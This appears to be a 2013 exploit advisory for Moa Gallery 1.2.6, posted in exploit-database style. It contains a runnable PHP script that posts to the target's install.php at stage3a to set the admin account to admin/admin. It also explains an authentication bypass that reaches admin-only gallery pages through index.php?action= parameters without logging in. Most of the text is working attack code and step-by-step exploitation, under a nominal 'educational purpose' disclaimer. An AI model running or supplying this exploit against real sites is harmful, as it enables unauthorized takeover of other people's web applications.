#!/usr/bin/php
# Exploit Title : Moa Gallery 1.2.6 Multiple Vulnerabilities
# Date : 5/17/2013
# Author: Slotleet
# Slotleet () GMAIL com
# https://fb.com/Slotleet
# Vendor Homepage: http://www.moagallery.net/
# Version affected : 1.2.6
# Tested on: WIN 7 Xd4rk EDITION
# Greets : Faris , Sec4ever , Omleet-dz , RAB3OUN , b0x , Damane , Mohamed-bel , The Injector , Ahmad Ramahi , Ziad-dz , And Again Faris :P
#
# this was written for educational purpose only. use it at your own risk.
# `AUTHOR` will be not responsible for any damage caused! user assumes all responsibility
# intended for authorized web application pentesting only!
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Moe Gallery 1.2.6 Multiple Vulnerabilities
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
~ [Add Admin]
 
<?
 
error_reporting(0);
  
  
if ($argc < 3){
echo "+--------------------------------------+\n";
echo "+    Usage : $argv[0] localhost /moe/      +\n";
echo "+--------------------------------------+\n";
    die();
}
  
  
$site = $argv[1];
$dir = $argv[2];
  
$ch = curl_init("http://$site/$dir/install.php?stage=stage3a");
curl_setopt ($ch, CURLOPT_POST, true);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "Moeuser=admin&Moepass=admin");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  
$result = curl_exec($ch);
  
if ($result){
  
echo "+-------------------------------------===--+\n";
echo "+ Done ~ Username : Admin Password : Admin +\n";
echo "+--------------------------------===-------+\n";
  
}
 
?>
 
~ [Session Bypass]
 
1  // Redirect admin access for anyone not logged in
2  if ((!UserIsLoggedIn()) && (0 == strcmp(substr($action, 0, 5), 'admin')))
3  {
4    $action = 'login';
5  }
6 
7  switch($action)
8  {
9    case "admin" :
10    {
11      include_once("sources/page_admin.php");
12      break;
13    }
14    case "admin_ftp" :
15    {
16      include_once("sources/page_admin_ftp.php");
17      break;
18    }
 
look to line 2 theres a function called Userisloggedin to check if the admin logged in or not, but there's `ACTION` param that calls sources folder with switch and case :).
let's see if there's a UserIsLoggedIn() in those files :).
 
 
  // Only proceed if a user is logged in
  if (!UserIsLoggedIn())
  {
Aahhh There is ;), i check those files, and we can bypass it by browsing (index.php?action=list here)
 
page_gallery_add.php
page_gallery_view.php
page_image_view.php
page_image_view_full.php
page_main_view.php
page_sitemap.php
page_slideshow.php
page_upgrade.php
 
we can browse it via (index.php?action=gallery_add) without (Page_) :)
 
./EOF